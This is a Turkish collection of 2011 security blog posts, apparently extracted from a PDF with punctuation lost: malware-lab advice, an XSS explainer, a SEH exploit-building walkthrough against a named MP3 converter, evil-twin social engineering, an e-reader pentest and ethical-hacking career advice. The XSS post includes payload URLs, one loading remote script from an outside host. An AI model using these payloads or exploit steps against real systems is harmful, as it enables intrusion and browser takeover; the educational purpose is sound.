Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

